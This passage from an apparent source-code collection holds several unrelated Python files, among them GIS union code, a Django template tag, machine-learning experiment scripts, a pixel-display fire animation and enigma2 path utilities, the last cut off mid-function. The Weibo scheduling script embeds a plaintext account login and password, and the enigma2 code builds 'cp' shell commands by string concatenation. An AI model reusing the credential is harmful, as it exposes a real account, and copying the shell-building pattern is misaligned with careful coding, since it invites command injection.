inFeatB = vlayerB.getFeatures(request).next()
atMapB = inFeatB.attributes()
tmpGeom = QgsGeometry(inFeatB.geometry())
if geom.intersects(tmpGeom):
int_geom = geom.intersection(tmpGeom)
lstIntersectingB.append(tmpGeom)
if int_geom is None:
# There was a problem creating the intersection
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
int_geom = QgsGeometry()
else:
int_geom = QgsGeometry(int_geom)
if int_geom.wkbType() == QGis.WKBUnknown or QgsWKBTypes.flatType(int_geom.geometry().wkbType()) == QgsWKBTypes.GeometryCollection:
# Intersection produced different geometry types
temp_list = int_geom.asGeometryCollection()
for i in temp_list:
if i.type() == geom.type():
int_geom = QgsGeometry(i)
try:
outFeat.setGeometry(int_geom)
outFeat.setAttributes(atMapA + atMapB)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
                            # Only write the intersection when its WKB type is
                            # one of the recognised type groups; this prevents
                            # write errors from mixed geometry types produced
                            # by the intersection (fix #3549)
if int_geom.wkbType() in wkbTypeGroups[wkbTypeGroups[int_geom.wkbType()]]:
try:
outFeat.setGeometry(int_geom)
outFeat.setAttributes(atMapA + atMapB)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
# the remaining bit of inFeatA's geometry
# if there is nothing left, this will just silently fail and we're good
diff_geom = QgsGeometry(geom)
if len(lstIntersectingB) != 0:
intB = QgsGeometry.unaryUnion(lstIntersectingB)
diff_geom = diff_geom.difference(intB)
if diff_geom.isGeosEmpty() or not diff_geom.isGeosValid():
ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
if diff_geom.wkbType() == 0 or QgsWKBTypes.flatType(diff_geom.geometry().wkbType()) == QgsWKBTypes.GeometryCollection:
temp_list = diff_geom.asGeometryCollection()
for i in temp_list:
if i.type() == geom.type():
diff_geom = QgsGeometry(i)
try:
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMapA)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
length = len(vproviderA.fields())
atMapA = [None] * length
featuresA = vector.features(vlayerB)
nFeat = len(featuresA)
for inFeatA in featuresA:
progress.setPercentage(nElement / float(nFeat) * 100)
add = False
geom = QgsGeometry(inFeatA.geometry())
diff_geom = QgsGeometry(geom)
atMap = [None] * length
atMap.extend(inFeatA.attributes())
intersects = indexB.intersects(geom.boundingBox())
if len(intersects) < 1:
try:
outFeat.setGeometry(geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
for id in intersects:
request = QgsFeatureRequest().setFilterFid(id)
inFeatB = vlayerA.getFeatures(request).next()
atMapB = inFeatB.attributes()
tmpGeom = QgsGeometry(inFeatB.geometry())
if diff_geom.intersects(tmpGeom):
add = True
diff_geom = QgsGeometry(diff_geom.difference(tmpGeom))
if diff_geom.isGeosEmpty() or not diff_geom.isGeosValid():
ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
else:
try:
                            # This only happens if the bounding box
                            # intersects, but the geometry doesn't
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
if add:
try:
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
nElement += 1
del writer
|
SebDieBln/QGIS
|
python/plugins/processing/algs/qgis/Union.py
|
Python
|
gpl-2.0
| 11,981
|
#
# Baruwa - Web 2.0 MailScanner front-end.
# Copyright (C) 2010-2012 Andrew Colin Kissa <andrew@topdog.za.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# vim: ai ts=4 sts=4 et sw=4
#
from django import template
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
register = template.Library()
def lists_sorter(context, field_name, field_text):
"sort by field"
rlink = None
link = ''
direc = 'dsc'
if context['app'] == 'lists':
link = reverse('lists-full-sort', args=[context['list_kind'],
context['direction'], field_name])
if field_name == context['order_by']:
if context['direction'] == 'dsc':
direc = 'asc'
else:
direc = 'dsc'
rlink = reverse('lists-full-sort', args=[context['list_kind'],
direc, context['order_by']])
return {'field_text': _(field_text), 'link': link,
'rlink': rlink, 'dir': direc}
register.inclusion_tag('tags/sorter.html', takes_context=True)(lists_sorter)
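# Template usage sketch (hypothetical field name and label):
#   {% load lists_sorter %}
#   {% lists_sorter "to_address" "To" %}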
|
liveaverage/baruwa
|
src/baruwa/lists/templatetags/lists_sorter.py
|
Python
|
gpl-2.0
| 1,742
|
from numpy import *
import alg6 as godfish
import alg5_workstypes as alg
import string
import os
import time
if __name__=='__main__':
import cPickle as pickle
fptr=open('yago_relationss_full.pkl', 'rb')
relationss= pickle.load(fptr)
fptr.close()
print 'yago loaded'
datasets=[]
for path,dirnames, filenames in os.walk('./techtc_processed_fixed/'):
filenames.sort()
for filename in filenames:
fptr=open(path+'/'+filename, 'rb')
datasets.append(pickle.load(fptr))
fptr.close()
count=0
res_7=[]
for ((trn, trn_lbl),(tst,tst_lbl)) in datasets:
print count
count+=1
        if count>15:  # limit this run to the first 15 datasets
continue
#make validation
true_trn=trn
tru_lbl=trn_lbl
trn=true_trn[7:-7]
trn_lbl=tru_lbl[7:-7]
vld=true_trn[:7]+true_trn[-7:]
vld_lbl=hstack((tru_lbl[:7],tru_lbl[-7:]))
errs_non_recurse=[]
errs_rel=[]
hug1=[]
hug2=[]
vars_non=[]
vars_=[]
vars_2=[]
vars_rel=[]
for i in [3,7]: #doesn't seem to matter much between 1/3/5 and 7/9(which are worse for tree)
alg.SPLIT_THRESH= i
alg.MAX_DEPTH= 0
blah11= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],0, True)
blah11.train(vld, vld_lbl)#non recursive
pred11=array([blah11.predict(x) for x in tst])
errs_non_recurse.append(mean(pred11!=tst_lbl))
vars_non.append(std(pred11!=tst_lbl))
alg.MAX_DEPTH= 0
blah12= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],0)
blah12.train(vld, vld_lbl)#non recursive
pred12=array([blah12.predict(x) for x in tst])
errs_rel.append(mean(pred12!=tst_lbl))
vars_rel.append(std(pred12!=tst_lbl))
alg.MAX_DEPTH= 1
before=time.time()
bc= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],5*(1**2))
            bc.train(vld, vld_lbl)  # recursive, depth 1
predx=array([bc.predict(x) for x in tst])
hug1.append(mean(predx!=tst_lbl))
vars_.append(std(predx!=tst_lbl))
print time.time()-before
alg.MAX_DEPTH= 2
before=time.time()
bc2= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],5*(2**2))
bc2.train(vld, vld_lbl)#recursive, somewhere around best only...
print time.time()-before
predy=array([bc2.predict(x) for x in tst])
hug2.append(mean(predy!=tst_lbl))
vars_2.append(std(predy!=tst_lbl))
#Note: 100*(d**2) barely scales to 4, and would likely fail for 5
a=(blah11, blah12, bc, bc2
,errs_non_recurse, errs_rel, hug1, hug2
,vars_non, vars_rel, vars_, vars_2)
res_7.append(a)
godfish.clean_tree_for_pickle(blah11.query_tree)
godfish.clean_tree_for_pickle(blah12.query_tree)
godfish.clean_tree_for_pickle(bc.query_tree)
godfish.clean_tree_for_pickle(bc2.query_tree)
with open('results%d.pkl'%(count),'wb') as fptr:
pickle.dump(a, fptr, -1)
with open('final_res15.pkl','wb') as fptr:
pickle.dump(res_7, fptr, -1)
|
lioritan/Thesis
|
problems/techTCrun_old.py
|
Python
|
gpl-2.0
| 3,484
|
#-*- coding: utf8 -*-
import TaodianApi
import json
import time
import os
import string
print "start"
def file_exist():
filelist = os.listdir("../webrobot/")
exist = False
mx = "0001"
for f in filelist:
temp = f.split(".", 1)
if mx < temp[0]:
mx = temp[0]
#if temp[1] == "running" or temp[1] == "waiting" :
# exist = True
return {"status":exist, "filename":mx}
def write_plan(filename, tasklist):
filename = string.atoi(filename)+ 2
filename = "../webrobot/%04d.waiting" % filename
print filename
fl = open(filename,"w")
for ts in tasklist:
fl.write(ts+"\r\n")
fl.close()
print "waiting"
try:
api = TaodianApi.TaodianApi()
while True:
fe = file_exist()
if fe["status"] :
print "has waiting"
else:
param = {"time":"111111"}
plan = api.call("fans_scan_plan_list", param)
print plan
data = plan["data"]["data"]
#weibo_list = api.call("timing_weibo_account_list",{})
#weibo_list = weibo_list["data"]["data"]
weibo_data = "login_user=%s,login_passwd=%s" % ("helloaction@126.com","xingkong")
tasklist = []
t = time.localtime(time.time())
ref_time = time.localtime(time.time() - 60*60*24*2)
task_plan = time.strftime("%m%d", t)
task_id = string.atoi(time.strftime("%H%M%S", t))
for d in data:
#weibo_data = "login_user=%s,login_passwd=%s" % (weibo_list[i]["login_user"], weibo_list[i]["login_password"])
#task_id = task_id + 1
db_time =time.strptime(d["last_update_time"], "%Y-%m-%d %H:%M:%S")
if d["last_update_time"] == d["create_time"] or ref_time > db_time:
nick = "%s:%d-->%s@wb_account=%s,%s" % (task_plan, task_id, "send",d["nick"].encode("utf8"),weibo_data.encode("utf8"))
tasklist.append(nick)
write_plan(fe["filename"], tasklist)
time.sleep(60*60*5)
except:
pass
|
emop/webrobot
|
sina_empower/libs/myserver.py
|
Python
|
gpl-2.0
| 1,789
|
# Sketch - A Python-based interactive drawing program
# Copyright (C) 1998, 1999 by Bernhard Herzog
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
from Sketch.warn import warn_tb, USER
import Sketch
from wrapper import DocumentWrapper
class Context:
def __init__(self):
self.application = Sketch.main.application
self.main_window = self.application.main_window
self.document = self.main_window.document
class Script:
def __init__(self, name, title, function, args = (), kwargs = None,
sensitive = None):
self.name = name
self.title = title
self.function = function
self.args = args
self.kwargs = kwargs
self.sensitive = sensitive
def Title(self):
return self.title
def execute(self, context, *args, **kw):
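        # Runs the user function inside a document transaction: any exception
        # is logged and aborts the transaction, and EndTransaction always runs.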
document = context.main_window.document
apply(document.BeginTransaction, args, kw)
try:
try:
kw = self.kwargs
if kw is None:
kw = {}
apply(self.function, (context,) + self.args, kw)
except:
warn_tb(USER, 'Error in user script "%s"', self.name)
document.AbortTransaction()
finally:
document.EndTransaction()
class SafeScript(Script):
def Execute(self):
context = Context()
context.document = DocumentWrapper(context.document)
self.execute(context, self.Title())
#class SelectionScript(Script):
#
# def Execute(self):
# self.execute(Context(), clear_selection_rect = 0)
class AdvancedScript(Script):
def Execute(self):
self.execute(Context(), self.Title())
|
shumik/skencil-c
|
Sketch/Scripting/script.py
|
Python
|
gpl-2.0
| 2,386
|
__author__ = 'tmy'
from rdflib import Graph, Literal, Namespace, RDFS, URIRef
import urllib.parse as urllib
import logging
import pandas as pd
from ext2rdf.src.Utilities.Constants import LOG_LEVEL, NAMESPACE
from ext2rdf.src.RDFConverter.AbstractConverter import AbstractConverter
log = logging.getLogger()
log.setLevel(LOG_LEVEL)
class Converter(AbstractConverter):
def __init__(self):
self.namespace = Namespace(NAMESPACE)
def convert(self, data_frame):
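        # Expects the DataFrame to provide 'Subject', 'Predicate' and 'Object'
        # columns, plus an optional 'PredicateLemma' column.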
log.info("converting data_frame...")
graph = Graph()
for _, row in data_frame.iterrows():
# Subject
subject_uri = urllib.quote(row['Subject'], '')
subject_node = URIRef(self.namespace[subject_uri])
graph.add((subject_node, RDFS.label, Literal(row['Subject'])))
# Predicate
predicate_uri = urllib.quote(row['Predicate'], '')
predicate_node = URIRef(self.namespace[predicate_uri])
graph.add((predicate_node, RDFS.label, Literal(row['Predicate'])))
# Object
object_uri = urllib.quote(row['Object'], '')
object_node = URIRef(self.namespace[object_uri])
graph.add((object_node, RDFS.label, Literal(row['Object'])))
graph.add((subject_node, predicate_node, object_node))
# Predicate Lemmatized
if not pd.isnull(row['PredicateLemma']):
predicate_lemma_uri = urllib.quote(row['PredicateLemma'], '')
predicate_lemma_node = URIRef(self.namespace[predicate_lemma_uri])
graph.add((subject_node, predicate_lemma_node, object_node))
return graph
|
Weissger/ext2rdf
|
src/RDFConverter/TripleStructureConverter.py
|
Python
|
gpl-2.0
| 1,676
|
import pisock
import datetime
def dlp_ReadDBList(sd, cardno=0, flags=None):
ret = []
i = 0
if flags is None:
flags = pisock.dlpDBListRAM
while True:
try:
lst = pisock.dlp_ReadDBList_(sd, cardno, pisock.dlpDBListMultiple | flags, i)
if (lst is None) or (len(lst) == 0):
return ret
for db in lst:
i = db['index'] + 1
ret.append(db)
except pisock.error:
if pisock.pi_palmos_error(sd)==pisock.dlpErrNotFound:
return ret
raise
def dlp_GetSysDateTime(sd):
r = pisock.dlp_GetSysDateTime_(sd)
return datetime.datetime.fromtimestamp(r)
|
unwiredben/pilot-link
|
bindings/Python/src/pisockextras.py
|
Python
|
gpl-2.0
| 701
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Domsense s.r.l. (<http://www.domsense.com>).
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import add_period
import remove_period
|
syci/domsense-agilebg-addons
|
account_vat_period_end_statement/wizard/__init__.py
|
Python
|
gpl-2.0
| 1,104
|
import Track, TManager, os, pygame
_sounds = {}
_images = {}
def _get_sound_and_image(soundpath, imagepath):
# sound
if _sounds.has_key(soundpath):
print "Reuse '" + soundpath + "'"
sound = _sounds.get(soundpath)
else:
if os.path.exists(soundpath):
print "Load '" + soundpath + "'"
_sounds[soundpath] = pygame.mixer.Sound(soundpath)
else:
print "Skip '" + soundpath + "'"
sound = _sounds.get(soundpath)
# image
if _images.has_key(imagepath):
print "Reuse '" + imagepath + "'"
image = _images.get(imagepath)
else:
if os.path.exists(imagepath):
print "Load '" + imagepath + "'"
_images[imagepath] = pygame.image.load(imagepath)
else:
print "Skip '" + imagepath + "'"
image = _images.get(imagepath)
return sound, image
def _load_playlist(manager, playlist_filename):
print "Loading playlist '" + playlist_filename + "'"
with open(playlist_filename, "r") as f:
content = f.readlines()
for l in content:
soundpath = l.rstrip()
if soundpath:
try:
imagepath = soundpath + ".bmp"
sound, image = _get_sound_and_image(soundpath, imagepath)
if sound != None:
track = Track.Track(sound, soundpath.split("/")[-1], image)
manager.add(track)
except RuntimeError:
print "Error when loading sound '" + l + "'"
f.close()
def load_playlists(playlist_filenames):
tmans = []
for playlist in playlist_filenames:
if not os.path.exists(playlist):
print('ERROR: Playlist "%s" was not found!' % sys.argv[1])
else:
tmanager = TManager.Manager()
_load_playlist(tmanager, playlist)
tmans.append(tmanager)
print str(len(tmans)) + " playlists loaded."
return tmans
|
danbraik/sample-studio
|
src/Loader.py
|
Python
|
gpl-2.0
| 2,048
|
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
class SingletonMixin(object):
def __new__(cls, *args, **kw):
if not hasattr(cls, '_instance'):
orig = super(SingletonMixin, cls)
cls._instance = orig.__new__(cls, *args, **kw)
return cls._instance
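# Usage sketch (hypothetical subclass): every call returns the same object.
#   class Config(SingletonMixin):
#       pass
#   assert Config() is Config()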
|
streethacker/soya
|
soya/utils/__init__.py
|
Python
|
gpl-2.0
| 321
|
#!/usr/bin/python
__author__ = 'Jannes Hoeke'
import led
import sys
from Colors import *
from led.PixelEventHandler import *
import random
""" https://github.com/HackerspaceBremen/pixels_basegame
depends on https://github.com/HackerspaceBremen/pygame-ledpixels
"""
class Basegame:
def __init__(self):
self.clock = pygame.time.Clock()
pygame.joystick.init()
# Initialize first joystick
if pygame.joystick.get_count() > 0:
stick = pygame.joystick.Joystick(0)
stick.init()
fallback_size = (90, 20)
self.ledDisplay = led.dsclient.DisplayServerClientDisplay('localhost', 8123, fallback_size)
pygame.font.init()
self.font_text = pygame.font.SysFont(None, 18)
# use same size for sim and real LED panel
size = self.ledDisplay.size()
self.simDisplay = led.sim.SimDisplay(size)
self.screen = pygame.Surface(size)
self.ticks = 0
self.fps = 10
self.gameover = False
self.sprites = []
# Draws the surface onto the display(s)
def update_screen(self, surface):
self.simDisplay.update(surface)
self.ledDisplay.update(surface)
# Gameloop update
def update(self):
screen = self.screen
        # Count ticks independently of wall-clock time so the timings stay
        # consistent even when the CPU is slow (tick-based timing proved
        # more reliable here than time-based timing)
self.ticks += 1
ticks = self.ticks
self.screen.fill(pygame.Color(0, 0, 0))
# generate new layer
        if ticks % 3 == 0:
newsprites = []
for x in range(screen.get_width()):
new = pygame.Surface((1, 10))
h = random.randint(0, 30)
s = random.randint(80, 100)
v = random.randint(30, 50)
c = pygame.Color(0)
c.hsva = (h, s, v, 1)
new.fill(c)
newsprites.append([new, [x, 21], c]) # [sprite, [x, y], color]
pass # generate new fire
if len(self.sprites) > random.randint(8, 12):
self.sprites.pop(0)
self.sprites.append(newsprites)
for sprites in self.sprites:
for sprite in sprites:
# decrease size
new_size = sprite[0].get_height() - random.randint(0, 2)
if new_size < 0:
sprites.remove(sprite)
continue
# move sprite upwards
sprite[1][1] -= random.randint(0, 3)
sprite[0] = pygame.Surface((1, new_size))
sprite[0].fill(sprite[2])
screen.blit(sprite[0], sprite[1])
# Print fps
if ticks % self.fps == 0:
print self.clock.get_fps()
# Process event queue
def process_event_queue(self):
for pgevent in pygame.event.get():
if pgevent.type == QUIT:
pygame.quit()
sys.exit()
event = process_event(pgevent)
# End the game
if event.button == EXIT:
self.gameover = True
def main(self):
screen = self.screen
# Show loading message
font_text = self.font_text
write_lobby = font_text.render("Basegame", True, WHITE)
screen.fill(BLACK)
screen.blit(write_lobby, (2, 4))
self.update_screen(screen)
# Clear event list before starting the game
pygame.event.clear()
# Start of the gameloop
while not self.gameover:
# Check controls
self.process_event_queue()
# Call update method
self.update()
# Send screen to display
self.update_screen(screen)
# Tick the clock and pass the maximum fps
self.clock.tick(self.fps)
# End of the game
write_gameover = font_text.render("GAME OVER", True, WHITE)
screen.fill(BLACK)
screen.blit(write_gameover, (10, 4))
self.update_screen(screen)
# Wait for keypress
while True:
event = process_event(pygame.event.wait())
if event.type == PUSH:
break
# Show score
screen.fill(BLACK)
text_gameover = "Score: " + str(int(0))
write_gameover = font_text.render(text_gameover, True, WHITE)
screen.blit(write_gameover, (2, 4))
self.update_screen(screen)
# Wait for keypress
while True:
event = process_event(pygame.event.wait())
if event.type == PUSH:
break
pygame.quit()
game = Basegame()
game.main()
|
jh0ker/pixels_fire
|
game.py
|
Python
|
gpl-2.0
| 4,792
|
# -*- coding: utf-8 -*-
import os
from os import mkdir, rmdir, system, walk, stat as os_stat, listdir, readlink, makedirs, error as os_error, symlink, access, F_OK, R_OK, W_OK, rename as os_rename
from stat import S_IMODE
from re import compile
from enigma import eEnv
try:
from os import chmod
have_chmod = True
except:
have_chmod = False
try:
from os import utime
have_utime = True
except:
have_utime = False
SCOPE_TRANSPONDERDATA = 0
SCOPE_SYSETC = 1
SCOPE_FONTS = 2
SCOPE_SKIN = 3
SCOPE_SKIN_IMAGE = 4
SCOPE_USERETC = 5
SCOPE_CONFIG = 6
SCOPE_LANGUAGE = 7
SCOPE_HDD = 8
SCOPE_PLUGINS = 9
SCOPE_MEDIA = 10
SCOPE_PLAYLIST = 11
SCOPE_CURRENT_SKIN = 12
SCOPE_DEFAULTDIR = 13
SCOPE_DEFAULTPARTITION = 14
SCOPE_DEFAULTPARTITIONMOUNTDIR = 15
SCOPE_METADIR = 16
SCOPE_CURRENT_PLUGIN = 17
PATH_CREATE = 0
PATH_DONTCREATE = 1
PATH_FALLBACK = 2
# songingeun - [
HDD_PATH="/hdd/movie/"
from Tools.HardwareInfo import HardwareInfo
if HardwareInfo().get_device_name() in ('ios300hd', 'ios300newhd', 'tmnanooe', 'mediabox', 'optimussos1', 'optimussos1plus'):
HDD_PATH="/media/usb/movie/"
# ]
defaultPaths = {
SCOPE_TRANSPONDERDATA: (eEnv.resolve("${sysconfdir}/"), PATH_DONTCREATE),
SCOPE_SYSETC: (eEnv.resolve("${sysconfdir}/"), PATH_DONTCREATE),
SCOPE_FONTS: (eEnv.resolve("${datadir}/fonts/"), PATH_DONTCREATE),
SCOPE_CONFIG: (eEnv.resolve("${sysconfdir}/enigma2/"), PATH_CREATE),
SCOPE_PLUGINS: (eEnv.resolve("${libdir}/enigma2/python/Plugins/"), PATH_CREATE),
SCOPE_LANGUAGE: (eEnv.resolve("${datadir}/enigma2/po/"), PATH_DONTCREATE),
SCOPE_SKIN: (eEnv.resolve("${datadir}/enigma2/"), PATH_DONTCREATE),
SCOPE_SKIN_IMAGE: (eEnv.resolve("${datadir}/enigma2/"), PATH_DONTCREATE),
# SCOPE_HDD: ("/hdd/movie/", PATH_DONTCREATE),
SCOPE_HDD: (HDD_PATH, PATH_DONTCREATE),
SCOPE_MEDIA: ("/media/", PATH_DONTCREATE),
SCOPE_PLAYLIST: (eEnv.resolve("${sysconfdir}/enigma2/playlist/"), PATH_CREATE),
SCOPE_USERETC: ("", PATH_DONTCREATE), # user home directory
SCOPE_DEFAULTDIR: (eEnv.resolve("${datadir}/enigma2/defaults/"), PATH_CREATE),
SCOPE_DEFAULTPARTITION: ("/dev/mtdblock6", PATH_DONTCREATE),
SCOPE_DEFAULTPARTITIONMOUNTDIR: (eEnv.resolve("${datadir}/enigma2/dealer"), PATH_CREATE),
SCOPE_METADIR: (eEnv.resolve("${datadir}/meta"), PATH_CREATE),
}
FILE_COPY = 0 # copy files from fallback dir to the basedir
FILE_MOVE = 1 # move files
PATH_COPY = 2 # copy the complete fallback dir to the basedir
PATH_MOVE = 3 # move the fallback dir to the basedir (can be used for changes in paths)
fallbackPaths = {
SCOPE_CONFIG: [("/home/root/", FILE_MOVE),
(eEnv.resolve("${datadir}/enigma2/defaults/"), FILE_COPY)],
SCOPE_HDD: [("/hdd/movies", PATH_MOVE)]
}
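# Resolve "base" within the directory that belongs to "scope": PATH_CREATE
# directories are created on demand, and a still-missing file is copied or
# moved in from the fallbackPaths entries registered for that scope.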
def resolveFilename(scope, base = "", path_prefix = None):
if base.startswith("~/"):
# you can only use the ~/ if we have a prefix directory
assert path_prefix is not None
base = os.path.join(path_prefix, base[2:])
# don't resolve absolute paths
if base.startswith('/'):
return base
if scope == SCOPE_CURRENT_SKIN:
from Components.config import config
# allow files in the config directory to replace skin files
tmp = defaultPaths[SCOPE_CONFIG][0]
if base and pathExists(tmp + base):
path = tmp
else:
tmp = defaultPaths[SCOPE_SKIN][0]
pos = config.skin.primary_skin.value.rfind('/')
if pos != -1:
                # if the base file is not available, use the default skin path as a fallback
tmpfile = tmp+config.skin.primary_skin.value[:pos+1] + base
if pathExists(tmpfile):
path = tmp+config.skin.primary_skin.value[:pos+1]
else:
path = tmp
else:
path = tmp
elif scope == SCOPE_CURRENT_PLUGIN:
tmp = defaultPaths[SCOPE_PLUGINS]
from Components.config import config
skintmp = defaultPaths[SCOPE_SKIN]
pos = config.skin.primary_skin.value.rfind('/')
if pos != -1:
#if basefile is not available inside current skin path, use the original provided file as fallback
skintmpfile = skintmp[0]+config.skin.primary_skin.value[:pos+1] + base
if fileExists(skintmpfile):
path = skintmp[0]+config.skin.primary_skin.value[:pos+1]
else:
path = tmp[0]
else:
path = tmp[0]
else:
tmp = defaultPaths[scope]
path = tmp[0]
flags = tmp[1]
if flags == PATH_CREATE:
if not pathExists(path):
try:
mkdir(path)
except OSError:
print "resolveFilename: Couldn't create %s" % path
return None
fallbackPath = fallbackPaths.get(scope)
if fallbackPath and not fileExists(path + base):
for x in fallbackPath:
try:
if x[1] == FILE_COPY:
if fileExists(x[0] + base):
try:
os.link(x[0] + base, path + base)
except:
system("cp " + x[0] + base + " " + path + base)
break
elif x[1] == FILE_MOVE:
if fileExists(x[0] + base):
os.rename(x[0] + base, path + base)
break
elif x[1] == PATH_COPY:
if pathExists(x[0]):
if not pathExists(defaultPaths[scope][0]):
mkdir(path)
system("cp -a " + x[0] + "* " + path)
break
elif x[1] == PATH_MOVE:
if pathExists(x[0]):
os.rename(x[0], path + base)
break
except Exception, e:
print "[D] Failed to recover %s:" % (path+base), e
# FIXME: we also have to handle DATADIR etc. here.
return path + base
# this is only the BASE - an extension must be added later.
pathExists = os.path.exists
isMount = os.path.ismount
def defaultRecordingLocation(candidate=None):
if candidate and os.path.exists(candidate):
return candidate
# First, try whatever /hdd points to, or /media/hdd
try:
path = os.readlink('/hdd')
except:
path = '/media/hdd'
if not os.path.exists(path):
path = ''
# Find the largest local disk
from Components import Harddisk
mounts = [m for m in Harddisk.getProcMounts() if m[1].startswith('/media/')]
biggest = 0
havelocal = False
for candidate in mounts:
try:
islocal = candidate[1].startswith('/dev/') # Good enough
stat = os.statvfs(candidate[1])
# Free space counts double
size = (stat.f_blocks + stat.f_bavail) * stat.f_bsize
if (islocal and not havelocal) or ((islocal or not havelocal) and (size > biggest)):
path = candidate[1]
havelocal = islocal
biggest = size
except Exception, e:
print "[DRL]", e
if path:
# If there's a movie subdir, we'd probably want to use that.
movie = os.path.join(path, 'movie')
if os.path.isdir(movie):
path = movie
if not path.endswith('/'):
path += '/' # Bad habits die hard, old code relies on this
return path
def createDir(path, makeParents = False):
try:
if makeParents:
makedirs(path)
else:
mkdir(path)
except:
return 0
else:
return 1
def removeDir(path):
try:
rmdir(path)
except:
return 0
else:
return 1
def fileExists(f, mode='r'):
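    # os.access() also returns False when the file does not exist, so this
    # doubles as an existence check for every mode.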
if mode == 'r':
acc_mode = R_OK
elif mode == 'w':
acc_mode = W_OK
else:
acc_mode = F_OK
return access(f, acc_mode)
def getRecordingFilename(basename, dirname = None):
# filter out non-allowed characters
non_allowed_characters = "/.\\:*?<>|\""
filename = ""
basename = basename.replace('\xc2\x86', '').replace('\xc2\x87', '')
for c in basename:
if c in non_allowed_characters or ord(c) < 32:
c = "_"
filename += c
# max filename length for ext4 is 255 (minus 8 characters for .ts.meta)
filename = filename[:247]
if dirname is not None:
if not dirname.startswith('/'):
dirname = os.path.join(defaultRecordingLocation(), dirname)
else:
dirname = defaultRecordingLocation()
filename = os.path.join(dirname, filename)
i = 0
while True:
path = filename
if i > 0:
path += "_%03d" % i
try:
open(path + ".ts")
i += 1
except IOError:
return path
# this is clearly a hack:
def InitFallbackFiles():
resolveFilename(SCOPE_CONFIG, "userbouquet.favourites.tv")
resolveFilename(SCOPE_CONFIG, "bouquets.tv")
resolveFilename(SCOPE_CONFIG, "userbouquet.favourites.radio")
resolveFilename(SCOPE_CONFIG, "bouquets.radio")
# returns a list of tuples containing pathname and filename matching the given pattern
# example-pattern: match all txt-files: ".*\.txt$"
def crawlDirectory(directory, pattern):
list = []
if directory:
expression = compile(pattern)
for root, dirs, files in walk(directory):
for file in files:
if expression.match(file) is not None:
list.append((root, file))
return list
def copyfile(src, dst):
try:
f1 = open(src, "rb")
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
f2 = open(dst, "w+b")
while True:
buf = f1.read(16*1024)
if not buf:
break
f2.write(buf)
st = os_stat(src)
mode = S_IMODE(st.st_mode)
if have_chmod:
chmod(dst, mode)
if have_utime:
utime(dst, (st.st_atime, st.st_mtime))
except:
print "copy", src, "to", dst, "failed!"
return -1
return 0
def copytree(src, dst, symlinks=False):
names = listdir(src)
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
if not os.path.isdir(dst):
mkdir(dst)
else:
makedirs(dst)
for name in names:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = readlink(srcname)
symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks)
else:
copyfile(srcname, dstname)
except:
print "dont copy srcname (no file or link or folder)"
try:
st = os_stat(src)
mode = S_IMODE(st.st_mode)
if have_chmod:
chmod(dst, mode)
if have_utime:
utime(dst, (st.st_atime, st.st_mtime))
except:
